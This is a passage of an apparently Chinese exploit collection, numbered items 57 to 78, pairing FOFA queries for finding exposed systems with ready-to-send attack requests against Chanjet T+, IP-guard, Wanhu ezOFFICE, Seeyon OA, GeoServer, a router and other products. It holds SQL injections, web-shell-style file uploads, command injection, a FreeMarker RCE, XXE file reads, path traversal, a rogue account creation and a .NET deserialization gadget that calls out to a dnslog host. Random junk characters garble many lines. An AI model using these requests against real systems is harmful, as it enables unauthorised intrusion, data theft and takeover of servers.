: ?! J, E. K V; T6 n0 D "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",6 S8 {8 W- k2 E0 s) o, T" j: g# p
"MethodName":"Start",. K& j: r- o3 z, |6 C* q G
"ObjectInstance":{2 {4 m& ?. a2 D: m
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 H9 E1 S9 v' a# n' E2 ^ T+ c4 X "StartInfo": {* G) t9 ], y3 o& j* M( C. \: G
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
$ C1 b6 O5 C9 R: l Q- }/ g "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"7 s4 M2 ?( h( f
}2 i0 x0 `& f' z% Z! A; m' j% O
}* v4 M: O: s2 E
}! F N4 Z Y( X2 L) W
}
" R, g: N. t% V
8 E/ P6 @) {) J' G m
1 e8 I- B0 y2 c7 y8 Y& H4 Y57. 畅捷通T+ keyEdit.aspx SQL注入
" J" {/ A6 d+ |7 OFOFA:app="畅捷通-TPlus"" a: l) G6 p' b; A6 z
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
& E) A. t! f6 X WHost: host1 x. b$ O, V: Z6 s$ t) s, n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, w) E% r, A; P( C" S* PAccept-Charset: utf-8
9 [7 O0 c& e5 L2 s3 J* x& lAccept-Encoding: gzip, deflate
7 V& m7 J! w! ZConnection: close
4 i8 \4 f4 N0 b% K* Q: {7 ~. f/ J$ _, C3 P6 z
# u6 M9 _3 S3 t6 @' L) o
58. 畅捷通T+ KeyInfoList.aspx sql注入
, q8 b2 }" `8 o( d" T. E' d) i6 r6 ~FOFA:app="畅捷通-TPlus"
5 _" b" o3 u V( K4 ~GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
1 t e4 V# M) \' }9 Q$ GHost: your-ip
/ V0 @ h1 S; e \8 PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 v7 @! f2 {9 G& m
Accept-Charset: utf-8; D" m) ]" Y8 I, z/ L' E8 u( j' L+ @
Accept-Encoding: gzip, deflate6 o, f' [! H+ l6 e! v" ^) X- _
Connection: close
% i- {4 M1 w. n( G; S2 |( d* f! u1 G( o
1 T7 `+ e" k, ]9 @! m1 y59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
) `9 Z' E5 f6 E5 v! I- g7 Z9 c8 Z0 ]FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
( \. R3 ^3 k, j! N( y+ J! `# y. jPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
% D5 e: T* P/ q$ i: G, [. dHost: 192.168.86.128:90909 P( r0 a- W% k. M' Y, s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
& T' T. @3 M8 Y. y* t: X% F% @, DConnection: close
, ^4 r2 f0 |; i! `1 cContent-Length: 1669
. t1 K/ n% N+ }2 L( n6 dAccept: */* h; l0 m4 p, Y% e! k P
Accept-Language: en! r* n O# ~8 d0 N
Content-Type: application/x-www-form-urlencoded
8 W, G, s- Y5 m3 x/ FAccept-Encoding: gzip) c% ~0 x2 D" h# F) ^% P4 H# ^% G. a
`# S: Y7 V; G. G. YPAYLOAD' A% D9 ~9 C) K1 T0 ~2 i
! k; C9 R% D/ o. y, |- X
. L. v$ h. \& O
60. 百卓Smart管理平台 importexport.php SQL注入
0 {6 L3 P Z6 |( S; U5 c5 d# `+ JFOFA:title="Smart管理平台"
1 V+ N% d- I3 ]$ KGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1/ ` J7 Y8 S! f$ j4 q/ T9 k! B- s7 z
Host:
) m: |( P( p9 D' M- P5 q; eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& n3 O! q! E# NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 n4 u. T0 D. L& q' f: XAccept-Encoding: gzip, deflate. V6 U. l& V5 X1 @% w3 s
Accept-Language: zh-CN,zh;q=0.9
( x2 n+ C, d9 B$ Y& u3 J0 hConnection: close4 K o* f" ?) @: `. v% |; U
$ @# j) K Z0 t3 t: ], B; }# Y a5 v. m, f- Z1 t
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
' f( Y5 `1 V0 I$ A+ f6 }FOFA: title="欢迎使用浙大恩特客户资源管理系统"
* d* U+ [' S+ B1 U9 OPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1$ q. s! D# a" f- ]6 K: ?
Host: x.x.x.x& n7 v6 f, D4 ?. s. _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, R9 r! ]* L/ k: M4 l- Z$ ~
Connection: close) X! e8 ]: O& W# t; W
Content-Length: 27
1 Z) P5 h0 |" r; iAccept: */*
0 o8 I) R1 H- ]! l- |: W n% CAccept-Encoding: gzip, deflate. b' r; l4 h* p2 g0 h a
Accept-Language: en" v& M* m& B$ e' h( w+ X* k
Content-Type: application/x-www-form-urlencoded
. `% L; C, _: p! b+ J4 S* w
9 r4 `/ o" \' c0 x/ Z) g4 o8uxssX66eqrqtKObcVa0kid98xa4 x3 k O9 `5 @1 @' t
0 W; w* B+ N' x3 d4 L- ~( [! h `' u& ~/ Z a) S: c
62. IP-guard WebServer 远程命令执行+ c' E% t2 y) k7 y/ f, W
FOFA:"IP-guard" && icon_hash="2030860561"
5 b h6 a8 N* d' I+ h3 i* eGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.19 m n }8 R- m* y1 ^
Host: x.x.x.x
! ^; R) Z6 S0 b5 c vUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
% \% Z6 K) ~! U# r1 C0 x, ]$ }Connection: close1 [4 o8 D, d; n1 \- t9 i1 I; Z
Accept: */*
6 s6 i! |) l+ g. MAccept-Language: en* W3 {& f4 P* |* F- m1 G- N9 r
Accept-Encoding: gzip5 i; }# x8 ]" F$ P
/ i- ^; n" N& c8 A! t0 N. a
+ g- T& s; k5 d+ G0 e# t0 |6 M访问
$ o$ k8 ?7 w* k& O) [9 ?8 m. `1 [
/ c9 O" r- V8 U) t9 K# `, jGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.16 b4 _/ b5 p& ]3 u: }/ w8 a: t
Host: x.x.x.x
1 D. Q% r& u# C v W" L# w/ i
7 P& p; T! T8 i7 ]$ i
q" p* I% J; _9 T# W) |0 S63. IP-guard WebServer任意文件读取
N# ~$ e, A! E' ?+ X, ]IP-guard < 4.82.0609.0/ n! n% z/ Z) L/ r4 w, @: \* H
FOFA:icon_hash="2030860561"# c1 t$ {- A$ c% M8 k, `( J
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
! @1 {+ @5 D; |6 RHost: your-ip
# N- D' [2 r% `$ z$ z# A P3 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; s# c8 W! C u! A U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ F& c4 b( h& @6 K8 ?4 h+ ^5 _
Accept-Encoding: gzip, deflate3 o8 w/ r6 z/ w( e2 U
Accept-Language: zh-CN,zh;q=0.9: P* Z; ~" T. J9 F' f
Connection: close: ]8 d& N+ K" _- v+ I5 Y- u& O
Content-Type: application/x-www-form-urlencoded/ g8 T" ^. @! f! u" ?: T6 F$ V
- ?' R' I* Y# C: ]( c5 T; \
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A s1 W; W2 p( ]
9 t/ ?8 u1 P4 V# H7 e- f2 R. h64. 捷诚管理信息系统CWSFinanceCommon SQL注入
6 v! k$ H3 @: r3 _ I1 g3 c5 w- GFOFA:body="/Scripts/EnjoyMsg.js"
7 R( a" I8 r/ X% SPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
: k X# S, m& K* ^6 }3 W5 r/ K9 mHost: 192.168.86.128:9001
5 q" _* ]* w' o8 b9 D" w+ t! U& dUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36: V% |) L' N) d
Connection: close
Z" z! `* f2 uContent-Length: 369
" y, P( e0 p4 p8 L1 {- b2 A+ @Accept: */*- E* O( `2 y- q, L: S% F
Accept-Language: en
C7 V% {. O/ x, H# h/ F/ FContent-Type: text/xml; charset=utf-8- x% R" n5 V7 B. [, R9 I7 e+ x/ S! z
Accept-Encoding: gzip2 W8 L7 m5 N8 k' @$ E% u
6 P8 U6 p/ r( @6 X3 R' g$ ~<?xml version="1.0" encoding="utf-8"?>
, Y- b0 w- `1 ]0 [) ~! J1 Q7 u<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 F" D2 E- y4 K: M6 |
<soap:Body>; w% }3 W7 t: g6 E/ S- _$ K* a
<GetOSpById xmlns="http://tempuri.org/">
& q- Y, m, ]# t# Y <sId>1';waitfor delay '0:0:5'--+</sId>. O5 g: g! G0 H# E
</GetOSpById>) ?4 W) {1 E5 X; K' S# s# g
</soap:Body>: G: e% x6 A; Q3 i$ Z6 G$ v
</soap:Envelope>* l3 Y0 k0 l' z
) U0 ~7 O( v: u
l, g: ]% \- g9 t* q
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过% F3 \4 i# w, f% I
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"! S1 D: L% N5 b4 Z
响应200即成功创建账号test123456/123456( y+ `% f. t8 e T% O( `! J
POST /SystemMng.ashx HTTP/1.1: S& b7 C, j. B. @+ H
Host:
! W" K7 i0 u' u# _: QUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
4 J. s0 @& V* X- n1 z1 E. k4 J$ gAccept-Encoding: gzip, deflate0 g) E; U( e& X
Accept: */*
5 ]" P. r) c( ~9 ]! j3 iConnection: close
( g' g% F% f; o# j0 p0 @Accept-Language: en
0 P$ z5 c+ k! G' tContent-Length: 174$ g( G: V0 b! L: s
' ]6 A7 ]" y5 HoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators5 s& n! D( y8 H
( m7 H* L$ a6 S/ l
q* Z5 b: c. m: _+ t2 G66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入$ t# m+ K7 w8 u* N; @* Z. y
FOFA:app="万户ezOFFICE协同管理平台"
+ ~3 Z+ }% ]$ i8 t0 A
& f! _; b" Z& S6 kGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
4 e4 I% o @* Y+ ?/ ~: e% A+ @Host: x.x.x.x
4 Y3 j; `. H! |) XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! G \- h3 r6 v' b/ YConnection: close# {, [7 f. h: w3 X1 V8 s
Accept: */*1 l4 g4 }6 n5 G9 d6 |# O3 R# V
Accept-Language: en
/ U! n. ~- T) j( K0 xAccept-Encoding: gzip
: N; {9 c" h, ^) j" J6 W j; h- q# \ [+ |
% K) i9 s* |$ K* L第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
+ C+ f' U) t& y% C& j5 I, T' I9 a+ }) P% @( C) @$ f7 H
67. 万户ezOFFICE wpsservlet任意文件上传4 v- P+ y5 j- Q8 H( r. R1 W$ E2 S* ~
FOFA:app="万户网络-ezOFFICE"
* h/ h6 P) A# F2 V" w* SnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
' b+ D- e9 G$ P s1 w' z/ \POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1( s2 W, k7 e/ b+ k( x8 e
Host: x.x.x.x: Q' A3 N: @- U$ E% K2 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0' D) F' M& R# b( U( {! K$ S
Content-Length: 173
% V5 i* P2 W9 j6 O6 ?# dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
9 B' k5 D( Z1 R$ B, HAccept-Encoding: gzip, deflate
) i9 e& ~; {+ a( z: gAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3- V0 [6 f, d N
Connection: close" k4 ~5 ?7 @5 l6 F) D* o7 Q
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
5 F6 J( o; e2 W( n' U1 J/ WDNT: 1
- d/ e5 s* u& w. BUpgrade-Insecure-Requests: 1
2 [) t' X5 K1 c
' E6 c* G8 G: Z! F) [% f0 B8 O; T--ufuadpxathqvxfqnuyuqaozvseiueerp
# ^. t9 a- B' E8 i; M vContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
7 C# D C: {# ^5 n8 m' h+ a5 n
: a5 r* _% |+ {<% out.print("sasdfghjkj");%>5 ]0 w3 M! y' k; ~8 o4 A. j
--ufuadpxathqvxfqnuyuqaozvseiueerp--
# y& ^# J( H$ f: }& G F1 }
}! |* `% l1 K4 _
+ V! S$ D' `7 ~2 w: P1 y- _9 a文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp0 s* I6 j& f1 s
; _; _) [2 z9 t% n68. 万户ezOFFICE wf_printnum.jsp SQL注入
( [: e% d3 R# G/ J! kFOFA:app="万户ezOFFICE协同管理平台"+ J9 M! |* q! |
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1' I) b) e: E! j
Host: {{host}}6 {: O/ r* f x/ O' w! w& o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36# ~; B4 F1 ?% c3 s
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8- g% j7 C% g" b4 ^
Accept-Encoding: gzip, deflate( h, o. D, r8 ~! a& v2 {! M
Accept-Language: zh-CN,zh;q=0.9
3 o# g: |- r( v. i) WConnection: close
9 c4 a$ n7 ]1 p; {- J4 U: H0 _% Y. C% }! i3 u% | f1 I
% D+ W4 U% K! K) F; c% |
69. 万户 ezOFFICE contract_gd.jsp SQL注入9 N' a5 G+ J% d& D$ x( G. Q
FOFA:app="万户ezOFFICE协同管理平台"
) E, q0 w" j# J6 N: zGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1! r# Z8 [6 e% i4 k+ ~
Host: your-ip
0 N' s) Y/ H2 Q& ^' D, ]& t0 ]* wUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ [# F" B% }% ]( U5 j" @2 r5 f$ lAccept-Encoding: gzip, deflate# g) T7 {1 L0 F# t$ r- I/ g5 R
Accept: */*
9 M" `' f$ L( f* }+ t9 d* cConnection: keep-alive
) n: l) c: c0 p' k9 W, k4 L7 g* x/ h& R' q \0 y+ \* o$ O
' A5 r& j( O3 t" k70. 万户ezEIP success 命令执行
$ o6 Q, t, Y$ m7 C( C$ ^FOFA:app="万户网络-ezEIP"
}$ e2 }: ?4 K5 uPOST /member/success.aspx HTTP/1.13 m K9 b6 z# F* c; d& {; f
Host: {{Hostname}}
6 Q/ f3 @& `4 `0 Z; l) q5 x. v, dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 i3 o4 o5 ~' v ]0 R. @
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
$ O3 C* [ `, {2 r, _: oContent-Type: application/x-www-form-urlencoded
- x5 x$ k+ A+ {. J4 y# N, {! ~TYPE: C5 ?3 _ n+ v& `, u
Content-Length: 167025 s+ R* a9 @$ ^( C( p2 s0 f
+ w+ E$ t! G0 l) }" R
__VIEWSTATE=PAYLOAD
+ k# h3 O7 x8 Q! w1 \( H: `6 r$ W2 V/ h) X
5 a( |, G1 ^ j: N$ x
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入5 t: j3 F2 R5 P' V' c/ ?* b) H
FOFA:body="PM2项目管理系统BS版增强工具.zip"
& a8 y2 f* `: { Z9 \3 g4 pGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
5 ^7 K6 V5 n! V+ I8 o3 YHost: x.x.x.xx.x.x.x4 v7 j) h0 D: v! u% ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% j5 }% p/ e1 EConnection: close
- n, ^+ n0 M6 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 p4 C( B6 G) x# {/ dAccept-Encoding: gzip, deflate$ i. v* q9 l6 F5 d7 p% j; B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ R( f) J' B+ h4 \# f
Upgrade-Insecure-Requests: 1
$ R9 l6 a+ E, E( D3 `( o5 [) f; V+ P$ R, u$ ?! P9 v7 }( |: S n8 R6 t
) M0 \6 \" M- R1 S j7 k72. 致远OA getAjaxDataServlet XXE# H/ k1 z1 U2 Q' v; P \9 l
FOFA:app="致远互联-OA"
; K6 U" m, J/ U. [, P: RPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
! a- F+ M& z) `1 LHost: 192.168.40.131:8099
9 U% y' h* A6 e( B5 FUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36# q& S% M4 W. L% w8 G/ P' y
Connection: close
9 H k' Q6 Q1 k& r8 H: f+ q3 }Content-Length: 583
$ M2 R* }# m. `& C" P/ oContent-Type: application/x-www-form-urlencoded
6 M( ]4 x k8 n4 r+ k1 [) I. R. [Accept-Encoding: gzip
; u! S& S' p, r! q% z4 d1 w. J& d. d& c" I6 {5 P: a
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E6 V2 _$ x" F, R- L
4 ^+ d# A' W4 T
6 d; c$ M$ T& L/ {% ^
73. GeoServer wms远程代码执行
5 I6 y6 j# O4 f: }0 cFOFA:icon_hash=”97540678”
! t1 Z2 U: K7 f5 gPOST /geoserver/wms HTTP/1.1
6 s6 o; Z( r. b1 T1 f& p; sHost:
# b( a6 L7 L% p$ ~. L" yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# e3 t3 {1 U4 k
Content-Length: 19813 A4 k2 E/ i% K0 I% a* {1 i
Accept-Encoding: gzip, deflate8 E0 c9 _* F, ]( s
Connection: close
4 H' `- j0 k$ {" X1 \Content-Type: application/xml: I7 s; [/ W) V8 H" b
SL-CE-SUID: 3+ n* }2 m% H6 |) W
' c. e1 e+ e& R
PAYLOAD
, X/ D7 w) V3 }+ I8 S! n9 I1 u9 l- z5 E
9 z$ [% t0 X, d* f
74. 致远M3-server 6_1sp1 反序列化RCE
+ [ F7 j) Y+ Z6 {9 iFOFA:title="M3-Server"4 _; d; S! z$ n+ a! O% c+ v$ I+ s
PAYLOAD+ {2 f; G) N% v4 o3 I4 i: R
( @8 i+ ?; f* ?: n! V2 f) q
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE5 ~7 d0 ~7 r- g$ l/ {+ t v
FOFA:app="TELESQUARE-TLR-2005KSH"
* k+ |* O& E, [% RGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
# U) P1 r, Q$ s, X# hHost: x.x.x.x* n+ d. W) B" x0 H9 @: F) {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& }/ U* g9 U$ ?( l" R! V- ^Connection: close: p; U4 ?; t' h6 d7 P
Accept: */*
! M! X6 G$ {7 H0 R4 q( e) o! V% rAccept-Language: en
9 K# @. c# P3 xAccept-Encoding: gzip4 }7 | w# r# x1 `! L
- f" C- J" c- Y3 T* n
8 ], ]$ H5 e" DGET /cgi-bin/test28256.txt HTTP/1.1
3 B; a. X. Y6 O8 ^Host: x.x.x.x
4 o! p0 U+ [3 F/ F% u2 e1 B. M8 _1 V1 x- T
2 W% B& C! J1 `# n; q% C76. 新开普掌上校园服务管理平台service.action远程命令执行+ o& \3 E( h) ^0 D1 l
FOFA:title="掌上校园服务管理平台"- \6 P+ m/ `+ j |: L" D+ x; f h( C3 Z
POST /service_transport/service.action HTTP/1.1" ^' O) f- i$ U9 f0 U/ P
Host: x.x.x.x
" G& t6 B1 s5 t1 s. H1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0- d/ n! x( u, [4 V
Connection: close% ^' O$ o% N$ b* }/ _# Z
Content-Length: 211
9 g. w/ j: C6 Y) ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 O% F2 h4 e( j; y l
Accept-Encoding: gzip, deflate+ u8 i" C4 f2 V4 M2 }& G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: {5 p# A& ^6 N3 O7 l' X8 P
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4* f5 [) b; e( @
Upgrade-Insecure-Requests: 16 d: v6 L8 b" U2 h0 L- l1 j$ O' C! | Q
7 X8 o8 z' }3 |6 o; L, ~
{7 v% _# j2 U" O7 j' d. o+ S
"command": "GetFZinfo"," G: Y+ m. Y; c0 ]
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"# Q4 C2 `$ X/ [3 `7 }/ t
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
) R4 t$ d, Y8 L8 z% i$ ?, w}
9 |9 B# G4 ]8 W, {& |+ m; G% X' t3 e/ w
. l: u1 u; a; F$ |+ k% \
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
\- }' D4 j! A i: hHost: x.x.x.x
) d" ~2 X' n8 d0 y. \* p
# Y, x, y/ W* h& x
2 a6 ?3 N6 u: c( g! I9 F% X: d( F+ S/ B/ h2 Z( `
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
; c& i: p% [# H* @FOFA:body="F22WEB登陆"
$ }0 i9 [4 T1 \8 Q: JPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1' u( b5 P8 ` Y5 X) t
Host: x.x.x.x n& N' ]8 b- i( h2 K& T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# h7 W. n! M; d" c, X3 E9 e$ b+ tConnection: close/ V. U/ ^0 I$ p; ^' {6 U& |0 J
Content-Length: 433: n3 }) i# j t
Accept: */*
0 E# t: ]! b5 p) ?. PAccept-Encoding: gzip, deflate
' o8 Y# D; x$ |) Z, BAccept-Language: zh-CN,zh;q=0.9* t5 Z- n6 Z }( ?
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix9 Y% g1 ^+ ^/ _( H7 w; M- U
1 U& W7 d* t P, J3 Q4 ~
------------398jnjVTTlDVXHlE7yYnfwBoix
, }+ W9 c+ i; z/ e5 }, a+ YContent-Disposition: form-data; name="folder". ]3 ~+ ?3 c. ?4 y4 i: J
, |6 W# J" F$ a* x- l/upload/udplog4 S; X- ?6 l6 w4 }* Z/ c) e; d$ o
------------398jnjVTTlDVXHlE7yYnfwBoix: C! [9 I" m, Y5 F) m1 b: L3 [
Content-Disposition: form-data; name="Filedata"; filename="1.aspx". }) j$ A' v* g9 n" ?
Content-Type: application/octet-stream
) U$ t7 X1 h9 H! H! G) n& q, E8 `8 R0 N. {3 D' E
hello1234567
" a7 k& p; L7 @3 Z f) o7 O------------398jnjVTTlDVXHlE7yYnfwBoix( m5 F; c) R+ T6 l i3 `3 u
Content-Disposition: form-data; name="Upload"
# w/ s- \* E4 G+ q" X0 U* D8 I
Submit Query9 G- p% ?$ n+ r
------------398jnjVTTlDVXHlE7yYnfwBoix--
' F! s" Y& ]8 _3 ]% |5 O8 o, P7 s
9 \) d! M1 Q7 I78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
+ E9 q" H# A: ~* s0 }! bFOFA:icon_hash="2001627082"
8 ~- m0 s; _- A& W% P+ O# OPOST /Platform/System/FileUpload.ashx HTTP/1.1; E& z. @! F7 G' X( P) u
Host: x.x.x.x# i# L8 z2 m" p9 c0 o- |/ ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 D9 e1 l0 v b8 Z& u
Connection: close
2 M: l- I- A. x; O; c- ^9 j3 N6 X. pContent-Length: 336
9 L( |% x% m8 f, F3 uAccept-Encoding: gzip
1 j2 M* e, y. b. P& o* zContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
, M8 r* ] n3 O" ?( I# k
, h% `% q4 _4 f& u% E7 D7 G------YsOxWxSvj1KyZow1PTsh98fdu6l4 I: |. J2 a* }) C
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt") S* p) s1 ^) ]
Content-Type: image/png3 K. {, o/ q4 @2 ^1 r8 e
8 k7 t% t9 {5 B' h0 C
YsOxWxSvj1KyZow1PTsh98fdu6l% m# r* _0 z. @! w+ p
------YsOxWxSvj1KyZow1PTsh98fdu6l% F" V3 M' P _' l* [# n: S
Content-Disposition: form-data; name="target"1 j+ Y* O3 }8 A, f1 t
/ ]& @0 f% F3 Q$ A7 N; Z F/Applications/SkillDevelopAndEHS/! c: b+ ~7 q; t; j" a/ v
------YsOxWxSvj1KyZow1PTsh98fdu6l--7 z% l5 B# s! G' W
* j1 w; J1 [1 b: }# q5 g; U3 p. h; B) r8 v& W8 @9 B; |- O
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
